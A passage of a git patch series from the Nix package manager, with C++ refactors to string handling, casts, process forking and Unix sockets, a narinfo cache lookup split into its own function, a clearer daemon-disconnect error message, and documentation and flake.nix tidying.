+ */ struct PackageInfo { public: diff --git a/src/libstore/builtins/buildenv.hh b/src/libstore/builtins/buildenv.hh index 8bebd390d..b24633e27 100644 --- a/src/libstore/builtins/buildenv.hh +++ b/src/libstore/builtins/buildenv.hh @@ -5,6 +5,9 @@ namespace nix { +/** + * Think of this as a "store level package attrset", but stripped down to no more than the needs of buildenv. + */ struct Package { Path path; bool active; From 0bc66e529fa34b84ae31301dd99f31cc16ccfd6c Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 10:13:55 +0100 Subject: [PATCH 278/654] Use npos member variables instead of full type --- src/libutil/file-system.cc | 6 +++--- src/libutil/util.cc | 10 +++++----- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index ab8d32275..14d496958 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -90,7 +90,7 @@ Path canonPath(PathView path, bool resolveSymlinks) /* Normal component; copy it. */ else { s += '/'; - if (const auto slash = path.find('/'); slash == std::string::npos) { + if (const auto slash = path.find('/'); slash == path.npos) { s += path; path = {}; } else { @@ -123,7 +123,7 @@ Path canonPath(PathView path, bool resolveSymlinks) Path dirOf(const PathView path) { Path::size_type pos = path.rfind('/'); - if (pos == std::string::npos) + if (pos == path.npos) return "."; return pos == 0 ? 
"/" : Path(path, 0, pos); } @@ -139,7 +139,7 @@ std::string_view baseNameOf(std::string_view path) last -= 1; auto pos = path.rfind('/', last); - if (pos == std::string::npos) + if (pos == path.npos) pos = 0; else pos += 1; diff --git a/src/libutil/util.cc b/src/libutil/util.cc index b23362b5c..6e47ce2a3 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -52,9 +52,9 @@ template C tokenizeString(std::string_view s, std::string_view separato { C result; auto pos = s.find_first_not_of(separators, 0); - while (pos != std::string_view::npos) { + while (pos != s.npos) { auto end = s.find_first_of(separators, pos + 1); - if (end == std::string_view::npos) end = s.size(); + if (end == s.npos) end = s.size(); result.insert(result.end(), std::string(s, pos, end - pos)); pos = s.find_first_not_of(separators, end); } @@ -69,7 +69,7 @@ template std::vector tokenizeString(std::string_view s, std::string std::string chomp(std::string_view s) { size_t i = s.find_last_not_of(" \n\r\t"); - return i == std::string_view::npos ? "" : std::string(s, 0, i + 1); + return i == s.npos ? 
"" : std::string(s, 0, i + 1); } @@ -89,7 +89,7 @@ std::string replaceStrings( { if (from.empty()) return res; size_t pos = 0; - while ((pos = res.find(from, pos)) != std::string::npos) { + while ((pos = res.find(from, pos)) != res.npos) { res.replace(pos, from.size(), to); pos += to.size(); } @@ -102,7 +102,7 @@ std::string rewriteStrings(std::string s, const StringMap & rewrites) for (auto & i : rewrites) { if (i.first == i.second) continue; size_t j = 0; - while ((j = s.find(i.first, j)) != std::string::npos) + while ((j = s.find(i.first, j)) != s.npos) s.replace(j, i.first.size(), i.second); } return s; From 1885d579db145d45f0aaf6130cd7e4db17b5e214 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:49:22 +0100 Subject: [PATCH 279/654] Improve String Handling --- src/libutil/file-system.cc | 6 +++++- src/libutil/util.cc | 9 ++++----- src/libutil/util.hh | 2 +- 3 files changed, 10 insertions(+), 7 deletions(-) diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index 14d496958..cf8a6d967 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -116,7 +116,11 @@ Path canonPath(PathView path, bool resolveSymlinks) } } - return s.empty() ? 
"/" : std::move(s); + if (s.empty()) { + s = "/"; + } + + return s; } diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 6e47ce2a3..8f310c6fe 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -122,12 +122,11 @@ bool hasSuffix(std::string_view s, std::string_view suffix) } -std::string toLower(const std::string & s) +std::string toLower(std::string s) { - std::string r(s); - for (auto & c : r) + for (auto & c : s) c = std::tolower(c); - return r; + return s; } @@ -135,7 +134,7 @@ std::string shellEscape(const std::string_view s) { std::string r; r.reserve(s.size() + 2); - r += "'"; + r += '\''; for (auto & i : s) if (i == '\'') r += "'\\''"; else r += i; r += '\''; diff --git a/src/libutil/util.hh b/src/libutil/util.hh index 27faa4d6d..11a0431da 100644 --- a/src/libutil/util.hh +++ b/src/libutil/util.hh @@ -180,7 +180,7 @@ bool hasSuffix(std::string_view s, std::string_view suffix); /** * Convert a string to lower case. */ -std::string toLower(const std::string & s); +std::string toLower(std::string s); /** From c924147c9d782e70e0ad421329252ced57f88d09 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:50:00 +0100 Subject: [PATCH 280/654] Drop parentheses from thunks --- src/libutil/file-descriptor.cc | 2 +- src/libutil/processes.cc | 12 ++++++------ src/libutil/unix-domain-socket.cc | 4 ++-- src/libutil/util.cc | 2 +- 4 files changed, 10 insertions(+), 10 deletions(-) diff --git a/src/libutil/file-descriptor.cc b/src/libutil/file-descriptor.cc index 692be3383..43e3cd979 100644 --- a/src/libutil/file-descriptor.cc +++ b/src/libutil/file-descriptor.cc @@ -96,7 +96,7 @@ void drainFD(int fd, Sink & sink, bool block) throw SysError("making file descriptor non-blocking"); } - Finally finally([&]() { + Finally finally([&] { if (!block) { if (fcntl(fd, F_SETFL, saved) == -1) throw SysError("making file descriptor blocking"); diff --git a/src/libutil/processes.cc b/src/libutil/processes.cc index 91a0ea66f..e1e60302b 100644 --- 
a/src/libutil/processes.cc +++ b/src/libutil/processes.cc @@ -131,7 +131,7 @@ void killUser(uid_t uid) users to which the current process can send signals. So we fork a process, switch to uid, and send a mass kill. */ - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { if (setuid(uid) == -1) throw SysError("setting uid"); @@ -197,7 +197,7 @@ static int childEntry(void * arg) pid_t startProcess(std::function fun, const ProcessOptions & options) { - std::function wrapper = [&]() { + ChildWrapperFunction wrapper = [&] { if (!options.allowVfork) logger = makeSimpleLogger(); try { @@ -229,7 +229,7 @@ pid_t startProcess(std::function fun, const ProcessOptions & options) PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); if (stack == MAP_FAILED) throw SysError("allocating stack"); - Finally freeStack([&]() { munmap(stack, stackSize); }); + Finally freeStack([&] { munmap(stack, stackSize); }); pid = clone(childEntry, stack + stackSize, options.cloneFlags | SIGCHLD, &wrapper); #else @@ -308,7 +308,7 @@ void runProgram2(const RunOptions & options) } /* Fork. 
*/ - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { if (options.environment) replaceEnv(*options.environment); if (options.standardOut && dup2(out.writeSide.get(), STDOUT_FILENO) == -1) @@ -350,7 +350,7 @@ void runProgram2(const RunOptions & options) std::promise promise; - Finally doJoin([&]() { + Finally doJoin([&] { if (writerThread.joinable()) writerThread.join(); }); @@ -358,7 +358,7 @@ void runProgram2(const RunOptions & options) if (source) { in.readSide.close(); - writerThread = std::thread([&]() { + writerThread = std::thread([&] { try { std::vector buf(8 * 1024); while (true) { diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index 05bbb5ba3..dc19daf9e 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -47,7 +47,7 @@ void bind(int fd, const std::string & path) addr.sun_family = AF_UNIX; if (path.size() + 1 >= sizeof(addr.sun_path)) { - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { Path dir = dirOf(path); if (chdir(dir.c_str()) == -1) throw SysError("chdir to '%s' failed", dir); @@ -78,7 +78,7 @@ void connect(int fd, const std::string & path) if (path.size() + 1 >= sizeof(addr.sun_path)) { Pipe pipe; pipe.create(); - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { try { pipe.readSide.close(); Path dir = dirOf(path); diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 8f310c6fe..75bb31c9b 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -183,7 +183,7 @@ std::string base64Encode(std::string_view s) std::string base64Decode(std::string_view s) { constexpr char npos = -1; - constexpr std::array base64DecodeChars = [&]() { + constexpr std::array base64DecodeChars = [&] { std::array result{}; for (auto& c : result) c = npos; From d11d7849f7676eb8b2c771356b9be8d8bb756cc8 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:51:47 +0100 Subject: [PATCH 281/654] Use ChildWrapperFunction type and make casts more 
explicit --- src/libutil/processes.cc | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/src/libutil/processes.cc b/src/libutil/processes.cc index e1e60302b..28f1adcf0 100644 --- a/src/libutil/processes.cc +++ b/src/libutil/processes.cc @@ -168,11 +168,12 @@ void killUser(uid_t uid) ////////////////////////////////////////////////////////////////////// +using ChildWrapperFunction = std::function; /* Wrapper around vfork to prevent the child process from clobbering the caller's stack frame in the parent. */ -static pid_t doFork(bool allowVfork, std::function fun) __attribute__((noinline)); -static pid_t doFork(bool allowVfork, std::function fun) +static pid_t doFork(bool allowVfork, ChildWrapperFunction & fun) __attribute__((noinline)); +static pid_t doFork(bool allowVfork, ChildWrapperFunction & fun) { #ifdef __linux__ pid_t pid = allowVfork ? vfork() : fork(); @@ -188,8 +189,8 @@ static pid_t doFork(bool allowVfork, std::function fun) #if __linux__ static int childEntry(void * arg) { - auto main = (std::function *) arg; - (*main)(); + auto & fun = *reinterpret_cast(arg); + fun(); return 1; } #endif From 9d9f42cc38b06ddc3fe30f4c1695514774b5217e Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:52:38 +0100 Subject: [PATCH 282/654] Remove C-style casts --- src/libutil/file-descriptor.cc | 2 +- src/libutil/processes.cc | 4 ++-- src/libutil/unix-domain-socket.cc | 18 ++++++++++++++---- 3 files changed, 17 insertions(+), 7 deletions(-) diff --git a/src/libutil/file-descriptor.cc b/src/libutil/file-descriptor.cc index 43e3cd979..55d57e29b 100644 --- a/src/libutil/file-descriptor.cc +++ b/src/libutil/file-descriptor.cc @@ -114,7 +114,7 @@ void drainFD(int fd, Sink & sink, bool block) throw SysError("reading from file"); } else if (rd == 0) break; - else sink({(char *) buf.data(), (size_t) rd}); + else sink({reinterpret_cast(buf.data()), size_t(rd)}); } } diff --git a/src/libutil/processes.cc b/src/libutil/processes.cc index 
28f1adcf0..f5d584330 100644 --- a/src/libutil/processes.cc +++ b/src/libutil/processes.cc @@ -226,8 +226,8 @@ pid_t startProcess(std::function fun, const ProcessOptions & options) assert(!(options.cloneFlags & CLONE_VM)); size_t stackSize = 1 * 1024 * 1024; - auto stack = (char *) mmap(0, stackSize, - PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + auto stack = static_cast(mmap(0, stackSize, + PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0)); if (stack == MAP_FAILED) throw SysError("allocating stack"); Finally freeStack([&] { munmap(stack, stackSize); }); diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index dc19daf9e..3b6d54a2c 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -38,6 +38,14 @@ AutoCloseFD createUnixDomainSocket(const Path & path, mode_t mode) return fdSocket; } +static struct sockaddr* safeSockAddrPointerCast(struct sockaddr_un *addr) { + // Casting between types like these legacy C library interfaces require + // is forbidden in C++. + // To maintain backwards compatibility, the implementation of the + // bind function contains some hints to the compiler that allow for this + // special case. 
+ return reinterpret_cast(addr); +} void bind(int fd, const std::string & path) { @@ -45,6 +53,7 @@ void bind(int fd, const std::string & path) struct sockaddr_un addr; addr.sun_family = AF_UNIX; + auto psaddr {safeSockAddrPointerCast(&addr)}; if (path.size() + 1 >= sizeof(addr.sun_path)) { Pid pid = startProcess([&] { @@ -55,7 +64,7 @@ void bind(int fd, const std::string & path) if (base.size() + 1 >= sizeof(addr.sun_path)) throw Error("socket path '%s' is too long", base); memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (bind(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (bind(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot bind to socket '%s'", path); _exit(0); }); @@ -64,7 +73,7 @@ void bind(int fd, const std::string & path) throw Error("cannot bind to socket '%s'", path); } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (bind(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (bind(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot bind to socket '%s'", path); } } @@ -74,6 +83,7 @@ void connect(int fd, const std::string & path) { struct sockaddr_un addr; addr.sun_family = AF_UNIX; + auto psaddr {safeSockAddrPointerCast(&addr)}; if (path.size() + 1 >= sizeof(addr.sun_path)) { Pipe pipe; @@ -88,7 +98,7 @@ void connect(int fd, const std::string & path) if (base.size() + 1 >= sizeof(addr.sun_path)) throw Error("socket path '%s' is too long", base); memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (connect(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot connect to socket at '%s'", path); writeFull(pipe.writeSide.get(), "0\n"); } catch (SysError & e) { @@ -107,7 +117,7 @@ void connect(int fd, const std::string & path) } } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (connect(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot connect 
to socket at '%s'", path); } } From 8ae3aeec9442e2b249abdb42a2853618b74a68a2 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:52:53 +0100 Subject: [PATCH 283/654] Don't use std::make_unique right before release --- src/libutil/signals.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/signals.cc b/src/libutil/signals.cc index 4632aa319..eaa4ea30e 100644 --- a/src/libutil/signals.cc +++ b/src/libutil/signals.cc @@ -179,7 +179,7 @@ std::unique_ptr createInterruptCallback(std::function auto token = interruptCallbacks->nextToken++; interruptCallbacks->callbacks.emplace(token, callback); - auto res = std::make_unique(); + std::unique_ptr res {new InterruptCallbackImpl{}}; res->token = token; return std::unique_ptr(res.release()); From 55da93942428d51ba3fa3577d3ff79cd739fb38e Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Wed, 17 Jan 2024 02:57:11 +0100 Subject: [PATCH 284/654] fix typo --- doc/manual/src/contributing/documentation.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/contributing/documentation.md b/doc/manual/src/contributing/documentation.md index 75226cd1a..1dddb207c 100644 --- a/doc/manual/src/contributing/documentation.md +++ b/doc/manual/src/contributing/documentation.md @@ -172,7 +172,7 @@ Please observe these guidelines to ease reviews: > ``` ```` - Highlight syntax definiions as such, using [EBNF](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form) notation: + Highlight syntax definitions as such, using [EBNF](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form) notation: ```` > **Syntax** From f134dbdffb81cea72a2e4abfb9a13904417b82aa Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Wed, 17 Jan 2024 04:23:16 +0100 Subject: [PATCH 285/654] move section on make variables it should be after the general build instructions, as it goes into more detail. 
--- doc/manual/src/contributing/hacking.md | 42 +++++++++++++------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 0fa59e891..fbdc7b7f7 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -67,27 +67,6 @@ $ nix build You can also build Nix for one of the [supported platforms](#platforms). -## Makefile variables - -You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run -`make install`. - -You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment -variables to override `Makefile` variables. - -- `ENABLE_BUILD=yes` to enable building the C++ code. -- `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). - - The docs can take a while to build, so you may want to disable this for local development. -- `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. -- `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. -- `OPTIMIZE=1` to enable optimizations. -- `libraries=libutil programs=` to only build a specific library (this will - fail in the linking phase if you don't have the other libraries built, but is - useful for checking types). -- `libraries= programs=nix` to only build a specific program (this will not, in - general, work, because the programs need the libraries). - ## Building Nix To build all dependencies and start a shell in which all environment variables are set up so that those dependencies can be found: @@ -132,6 +111,27 @@ $ nix-build You can also build Nix for one of the [supported platforms](#platforms). +## Makefile variables + +You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run +`make install`. + +You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment +variables to override `Makefile` variables. + +- `ENABLE_BUILD=yes` to enable building the C++ code. 
+- `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). + + The docs can take a while to build, so you may want to disable this for local development. +- `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. +- `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. +- `OPTIMIZE=1` to enable optimizations. +- `libraries=libutil programs=` to only build a specific library (this will + fail in the linking phase if you don't have the other libraries built, but is + useful for checking types). +- `libraries= programs=nix` to only build a specific program (this will not, in + general, work, because the programs need the libraries). + ## Platforms Nix can be built for various platforms, as specified in [`flake.nix`]: From 28eb406834ed176d84e22898ccbcf4ecb963416c Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Wed, 17 Jan 2024 04:39:26 +0100 Subject: [PATCH 286/654] reword section on make variables - use one line per sentence - use imperative for instructions - add link to Make documentation --- doc/manual/src/contributing/hacking.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index fbdc7b7f7..fe91787a3 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -113,11 +113,9 @@ You can also build Nix for one of the [supported platforms](#platforms). ## Makefile variables -You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run -`make install`. +You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run `make install`. -You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment -variables to override `Makefile` variables. 
+Run `make` with [`--environment-overrides`](https://www.gnu.org/software/make/manual/make.html#index-_002de) to allow environment variables to override `Makefile` variables: - `ENABLE_BUILD=yes` to enable building the C++ code. - `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). @@ -126,11 +124,12 @@ variables to override `Makefile` variables. - `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. - `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. - `OPTIMIZE=1` to enable optimizations. -- `libraries=libutil programs=` to only build a specific library (this will - fail in the linking phase if you don't have the other libraries built, but is - useful for checking types). -- `libraries= programs=nix` to only build a specific program (this will not, in - general, work, because the programs need the libraries). +- `libraries=libutil programs=` to only build a specific library. + + This will fail in the linking phase if the other libraries haven't been built, but is useful for checking types. +- `libraries= programs=nix` to only build a specific program. + + This will not work in general, because the programs need the libraries. ## Platforms From d0a284284bc93014c98294292b7f4b95864f37ee Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 17 Jan 2024 16:54:45 +0100 Subject: [PATCH 287/654] refactor: Extract simply, awkwardly Store::queryPathInfoFromClientCache This is useful for determining quickly which substituters to query. An alternative would be for users to invoke the narinfo cache db directly, so why do we need this change? - It is easier to use. I believe Nix itself should also use it. - This way, the narinfo cache db remains an implementation detail. - Callers get to use the in-memory cache as well. 
--- src/libstore/store-api.cc | 64 +++++++++++++++++++++++---------------- src/libstore/store-api.hh | 12 ++++++++ 2 files changed, 50 insertions(+), 26 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 0c37ecd30..66bc95625 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -685,6 +685,42 @@ static bool goodStorePath(const StorePath & expected, const StorePath & actual) && (expected.name() == Store::MissingName || expected.name() == actual.name()); } +bool Store::queryPathInfoFromClientCache(const StorePath & storePath, + Callback> & callback) +{ + auto hashPart = std::string(storePath.hashPart()); + + { + auto res = state.lock()->pathInfoCache.get(std::string(storePath.to_string())); + if (res && res->isKnownNow()) { + stats.narInfoReadAverted++; + if (!res->didExist()) + throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); + callback(ref(res->value)); + return true; + } + } + + if (diskCache) { + auto res = diskCache->lookupNarInfo(getUri(), hashPart); + if (res.first != NarInfoDiskCache::oUnknown) { + stats.narInfoReadAverted++; + { + auto state_(state.lock()); + state_->pathInfoCache.upsert(std::string(storePath.to_string()), + res.first == NarInfoDiskCache::oInvalid ? 
PathInfoCacheValue{} : PathInfoCacheValue{ .value = res.second }); + if (res.first == NarInfoDiskCache::oInvalid || + !goodStorePath(storePath, res.second->path)) + throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); + } + callback(ref(res.second)); + return true; + } + } + + return false; +} + void Store::queryPathInfo(const StorePath & storePath, Callback> callback) noexcept @@ -692,32 +728,8 @@ void Store::queryPathInfo(const StorePath & storePath, auto hashPart = std::string(storePath.hashPart()); try { - { - auto res = state.lock()->pathInfoCache.get(std::string(storePath.to_string())); - if (res && res->isKnownNow()) { - stats.narInfoReadAverted++; - if (!res->didExist()) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - return callback(ref(res->value)); - } - } - - if (diskCache) { - auto res = diskCache->lookupNarInfo(getUri(), hashPart); - if (res.first != NarInfoDiskCache::oUnknown) { - stats.narInfoReadAverted++; - { - auto state_(state.lock()); - state_->pathInfoCache.upsert(std::string(storePath.to_string()), - res.first == NarInfoDiskCache::oInvalid ? PathInfoCacheValue{} : PathInfoCacheValue{ .value = res.second }); - if (res.first == NarInfoDiskCache::oInvalid || - !goodStorePath(storePath, res.second->path)) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - } - return callback(ref(res.second)); - } - } - + if (queryPathInfoFromClientCache(storePath, callback)) + return; } catch (...) { return callback.rethrow(); } auto callbackPtr = std::make_shared(std::move(callback)); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 9667b5e9e..2a1092d9e 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -282,6 +282,18 @@ public: void queryPathInfo(const StorePath & path, Callback> callback) noexcept; + /** + * NOTE: this is not the final interface - to be modified in next commit. 
+ * + * Asynchronous version that only queries the local narinfo cache and not + * the actual store. + * + * @return true if the path was known and the callback invoked + * @return false if the path was not known and the callback not invoked + * @throw InvalidPathError if the path is known to be invalid + */ + bool queryPathInfoFromClientCache(const StorePath & path, Callback> & callback); + /** * Query the information about a realisation. */ From e938912cff5ccded14444377f9776e86c585f917 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 17 Jan 2024 13:08:03 -0500 Subject: [PATCH 288/654] Fix indentation error in `flake.nix` --- flake.nix | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/flake.nix b/flake.nix index 49f214e72..0309f84b3 100644 --- a/flake.nix +++ b/flake.nix @@ -197,12 +197,12 @@ perl-bindings = final.nix-perl-bindings; }; - nix-perl-bindings = final.callPackage ./perl { - inherit fileset stdenv; - }; - + nix-perl-bindings = final.callPackage ./perl { + inherit fileset stdenv; }; + }; + in { # A Nixpkgs overlay that overrides the 'nix' and # 'nix.perl-bindings' packages. From 1de8eed28a3cb1e449c10ecdb524aec27fe9dc35 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 17 Jan 2024 13:11:04 -0500 Subject: [PATCH 289/654] Move dependency patches from top level into subdir Good to not clutter the top-level directory. 
--- .../boehmgc-coroutine-sp-fallback.diff | 0 .../boehmgc-traceable_allocator-public.diff | 0 flake.nix | 4 ++-- package.nix | 1 - 4 files changed, 2 insertions(+), 3 deletions(-) rename boehmgc-coroutine-sp-fallback.diff => dep-patches/boehmgc-coroutine-sp-fallback.diff (100%) rename boehmgc-traceable_allocator-public.diff => dep-patches/boehmgc-traceable_allocator-public.diff (100%) diff --git a/boehmgc-coroutine-sp-fallback.diff b/dep-patches/boehmgc-coroutine-sp-fallback.diff similarity index 100% rename from boehmgc-coroutine-sp-fallback.diff rename to dep-patches/boehmgc-coroutine-sp-fallback.diff diff --git a/boehmgc-traceable_allocator-public.diff b/dep-patches/boehmgc-traceable_allocator-public.diff similarity index 100% rename from boehmgc-traceable_allocator-public.diff rename to dep-patches/boehmgc-traceable_allocator-public.diff diff --git a/flake.nix b/flake.nix index 49f214e72..2b9ce17e3 100644 --- a/flake.nix +++ b/flake.nix @@ -163,10 +163,10 @@ enableLargeConfig = true; }).overrideAttrs(o: { patches = (o.patches or []) ++ [ - ./boehmgc-coroutine-sp-fallback.diff + ./dep-patches/boehmgc-coroutine-sp-fallback.diff # https://github.com/ivmai/bdwgc/pull/586 - ./boehmgc-traceable_allocator-public.diff + ./dep-patches/boehmgc-traceable_allocator-public.diff ]; }); diff --git a/package.nix b/package.nix index a1188ba9c..192df90ab 100644 --- a/package.nix +++ b/package.nix @@ -174,7 +174,6 @@ in { ./mk (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) ] ++ lib.optionals doBuild [ - ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc ./precompiled-headers.h From 39ab50f9ee64f0455e37a8136638d9757252c226 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 17 Jan 2024 21:41:37 +0100 Subject: [PATCH 290/654] Store::buildPaths(): Fix display of store paths This was broken in 7ac39ff05c8353c665174e8df61dd76a2b0b93db. 
--- src/libstore/build/entry-points.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libstore/build/entry-points.cc b/src/libstore/build/entry-points.cc index 74eca63f3..7f0a05d5d 100644 --- a/src/libstore/build/entry-points.cc +++ b/src/libstore/build/entry-points.cc @@ -26,9 +26,9 @@ void Store::buildPaths(const std::vector & reqs, BuildMode buildMod } if (i->exitCode != Goal::ecSuccess) { if (auto i2 = dynamic_cast(i.get())) - failed.insert(std::string { i2->drvPath.to_string() }); + failed.insert(printStorePath(i2->drvPath)); else if (auto i2 = dynamic_cast(i.get())) - failed.insert(std::string { i2->storePath.to_string()}); + failed.insert(printStorePath(i2->storePath)); } } From a3cf27ca47328b11173147ca7180e0bae798bb2c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 17 Jan 2024 22:19:51 +0100 Subject: [PATCH 291/654] Print a more helpful message if the daemon crashes Instead of error: unexpected end-of-file you now get error: Nix daemon disconnected unexpectedly (maybe it crashed?) --- src/libstore/remote-store.cc | 1 + src/libutil/serialise.cc | 2 +- src/libutil/serialise.hh | 5 +++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 078b9fe00..ccf95beef 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -67,6 +67,7 @@ void RemoteStore::initConnection(Connection & conn) { /* Send the magic greeting, check for the reply. 
*/ try { + conn.from.endOfFileError = "Nix daemon disconnected unexpectedly (maybe it crashed?)"; conn.to << WORKER_MAGIC_1; conn.to.flush(); StringSink saved; diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index 316105603..afbf66b9d 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -132,7 +132,7 @@ size_t FdSource::readUnbuffered(char * data, size_t len) n = ::read(fd, data, len); } while (n == -1 && errno == EINTR); if (n == -1) { _good = false; throw SysError("reading from file"); } - if (n == 0) { _good = false; throw EndOfFile("unexpected end-of-file"); } + if (n == 0) { _good = false; throw EndOfFile(endOfFileError); } read += n; return n; } diff --git a/src/libutil/serialise.hh b/src/libutil/serialise.hh index 3f57ce88b..689b2070b 100644 --- a/src/libutil/serialise.hh +++ b/src/libutil/serialise.hh @@ -153,12 +153,13 @@ struct FdSource : BufferedSource { int fd; size_t read = 0; + std::string endOfFileError{"unexpected end-of-file"}; FdSource() : fd(-1) { } FdSource(int fd) : fd(fd) { } - FdSource(FdSource&&) = default; + FdSource(FdSource &&) = default; - FdSource& operator=(FdSource && s) + FdSource & operator=(FdSource && s) { fd = s.fd; s.fd = -1; From 3016e67c21c8ea1f1c44528c7895fad1761406c3 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 16 Jan 2024 10:35:16 -0500 Subject: [PATCH 292/654] `bind`: give same treatment as `connect` in #8544, dedup It is good to propagate the underlying error so whether or not we use a process to deal with path length issues is not observable. Also, as these wrapper functions got more and more complex, the code duplication got worse and worse. The new `bindConnectProcHelper` function deduplicates them. 
